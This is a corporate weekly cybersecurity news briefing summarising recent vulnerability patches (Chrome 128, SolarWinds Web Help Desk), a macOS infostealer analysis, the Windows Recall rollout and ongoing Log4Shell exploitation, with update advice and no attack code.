Hybrid Cloud
Cyber Security & NaaS
AI & Data
IoT & Connectivity
Business Applications
Intelligent Workplace
Consulting & Professional Services
Small Medium Enterprise
Health and Social Care
Industry
Retail
Tourism and Leisure
Transport & Logistics
Energy & Utilities
Cyber Security Briefing, 17 - 23 August
Chrome 128 fixes 38 vulnerabilities, among them a 0-day
Google recently released version 128 of Chrome, which fixes 38 vulnerabilities, highlighting one for which there is already an exploit in circulation. This flaw, identified as CVE-2024-7971, is due to a type confusion in the V8 JavaScript engine and WebAssembly, allowing a remote attacker to exploit a heap memory corruption via a manipulated HTML page.
Other critical issues fixed include a post-release usage vulnerability in the Passwords feature (CVE-2024-7964), an implementation flaw in V8 (CVE-2024-7965) and an out-of-bounds memory access issue in Skia (CVE-2024-7966). In addition, several medium and low severity vulnerabilities have been fixed in components such as PDFium, Permissions, FedCM and the Chrome installer.
✅ Users are advised to update to version 128.0.6613.84/.85 for Windows and macOS, and version 128.0.6613.84 for Linux to mitigate potential threats. Users of Chromium-based browsers are also urged to apply the fixes as soon as they become available. Google will keep details about the vulnerability with active exploit restricted until most users have installed the updates.
SolarWinds fixes critical Web Help Desk vulnerability
SolarWinds released security patches to fix a critical vulnerability in its Web Help Desk (WHD) software, which could allow unauthenticated remote attackers to gain unauthorized access to susceptible instances. The vulnerability, identified as CVE-2024-28987 and with a CVSSv3 score of 9.1 according to the vendor, involves an encrypted credential flaw that allows unauthenticated remote users to access internal functionality and modify data. SolarWinds has not confirmed whether this flaw, fixed in version 12.8.3, has been exploited in the wild. However, it indicates that the update must be run manually.
Separately, the issued patches also include fixes for another critical remote code execution vulnerability, identified as CVE-2024-28986 and with a CVSSv3 of 9.8 according to the vendor. This vulnerability had already been addressed previously, but this new version includes all the fixes for this flaw, which CISA has added to its catalog of known exploited vulnerabilities.
Cthulhu Stealer: new malware targeting macOS devices
Researchers at Cado Security have published an analysis of Cthulhu Stealer, a new Malware-as-a-Service targeting macOS devices and offered for $500 per month on cybercrime forums. Programmed in GoLang, this malware is an Apple disk image (DMG) that masquerades as a legitimate application and requires user interaction in order to run.
Specifically, the malware asks the victim for their device password and Metamask cryptocurrency wallet password, after which it obtains information from the infected device, including its IP and operating system version. Finally, Cthulhu Stealer steals credentials from search engines, cryptocurrencies and video game accounts.
The researchers point out that the malware does not seem particularly sophisticated, as it does not have any detection evasion techniques. Also, Cthulhu Stealer has a high degree of similarity with Atomic Stealer, even sharing the same typos in the code.
Microsoft to take back Windows Recall
After Microsoft announced on June 7 the decision to disable the Windows Recall feature by default on Copilot+ PCs, on August 21 it was learned that a revised version of Recall will be available in October for affiliates of the Windows Insiders program. Recall is a feature that stores screenshots of everything the user sees, which generated a lot of criticism for possible security issues.
Log4Shell is still being exploited two years later
Two years after its discovery, the Log4Shell vulnerability (CVE-2021-44228, CVSSv3 10) continues to be exploited by cybercriminals to deploy malware on vulnerable systems. Datadog researchers discovered a campaign in which attackers used obfuscated LDAP requests to abuse Log4Shell and achieve the implementation of XMRig, a cryptocurrency miner.
◾ This newsletter is one of the deliverables of our Operational and Strategic Intelligence service. If you are interested in knowing the rest of the Operational and Strategic Intelligence contents included in the service, please contact us →
